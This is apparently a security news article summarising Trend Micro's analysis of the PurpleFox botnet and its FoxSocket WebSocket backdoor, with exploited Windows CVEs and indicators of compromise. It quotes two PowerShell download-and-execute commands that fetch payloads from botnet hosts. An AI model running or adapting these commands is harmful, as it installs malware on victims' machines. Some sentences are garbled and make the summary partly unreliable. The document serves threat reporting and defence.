According to researchers, the new variant uses WebSockets to implement more secure C2 bidirectional communication and its operators have incorporated new exploits and payloads.TrendMicro researchers have explained about the PurpleFox botnet’s latest evolution. The specialists uncovered a new.NET backdoor is otherwise known as FoxSocket, that is closely linked to the PurpleFox operation.
Trend Micro is a long script that comprises three privilege escalation components.These target Windows 7 to Windows 10 systems, but are limited to 64-bit systems only.
The flaws that are exploited by the latest PurpleFox with the following:
- Windows 7/Windows Server 2008 – CVE-2020-1054, CVE-2019-0808
- Windows 8/Windows Server 2012 – CVE-2019-1458
- Windows 10/Windows Server 2019 – CVE-2021-1732
The configuration parameters for deploying this backdoor had a low number of subdomains to contact the C&C servers in the early iterations, agreeing with the creation data of the malicious domain advb9fyxlf2v[.]com, compared to the latest one.
“After selecting the appropriate vulnerability, it uses the PowerSploit module to reflectively load the embedded exploit bundle binary with the target vulnerability and an MSI command as arguments. As a failover, it uses the Tater module to launch the MSI command.” reads the analysis published by TrendMicro. “The goal is to install the MSI package as an admin without any user interaction.
The list of WebSocket commands observed by TrendMicro is extensive, and although there are some discrepancies between different variants, the table below summarizes them
PowerShell commands being executed:
- “cmd.exe” /c powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘hxxp[[:]]//18.104.22.168[[:]]17881/57BC9B7E.Png’);MsiMake hxxp[[:]]//22.214.171.124[[:]]17881/0CFA042F.Png”
- “cmd.exe” /c powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http[:]//126.96.36.199[:]13405/57BC9B7E.Png’);MsiMake http[:]//188.8.131.52[:]13405/0CFA042F.Png”
These commands download a malicious payload from the specified URLs, which are hosted on multiple compromised servers. These servers are part of the PurpleFox botnet, with most of these located in China:
The fetched payload is a long script consisting of three components:
- Tater (Hot Potato – privilege escalation)
- Embedded exploit bundle binary (privilege escalation)
Finally they concluded that, PurpleFox’s rootkit tools allow it to carry out its goals in a more stealthy manner. They enable PurpleFox to remain on impacted systems and deliver more payloads to them. We’re still keeping an eye on these new varieties and their payloads. The new.NET WebSocket backdoor (dubbed FoxSocket and detected as Backdoor.MSIL.PURPLEFOX.AA) is being intensively monitored in order to learn more about this threat actor’s aims and goals.
Indicators of compromise:
SHA-256 1dd5124b7ade65c5abe4b4c0e74441a41761207e430c0a563fc05d91aee226e0 51e7c574abc9c323b6ab257305b568cbfa898187309b6be75f94b69116687573 7edb974e451b6cfeb87bb741f2ce8fb2982e233ce37db90c70d57f15164b8ccd c0fee2c000f9caf6b49c73ebc6c84c9084ab1aec5d360b9b7dea6b3156f52acc d4626740bd53e9ae2cf524be4fa83fd6ba0f5692d2cb5f50b2af8232b4de2d0e d4f9a5f8543a91001a859a064b9b0082e633a09e7e23c5a1557bcf5fb59f284c f58e4985feba1658de9b25502c367d802aea9da87c01ba3ad38d2f861c44298e --------------------------------------------- Domain www.advb9fyxlf2v.com www2.advb9fyxlf2v.com www3.advb9fyxlf2v.com www4.advb9fyxlf2v.com www5.advb9fyxlf2v.com www6.advb9fyxlf2v.com www7.advb9fyxlf2v.com www8.advb9fyxlf2v.com --------------------------------------------- IP Address 184.108.40.206 220.127.116.11 18.104.22.168 22.214.171.124 126.96.36.199 188.8.131.52 184.108.40.206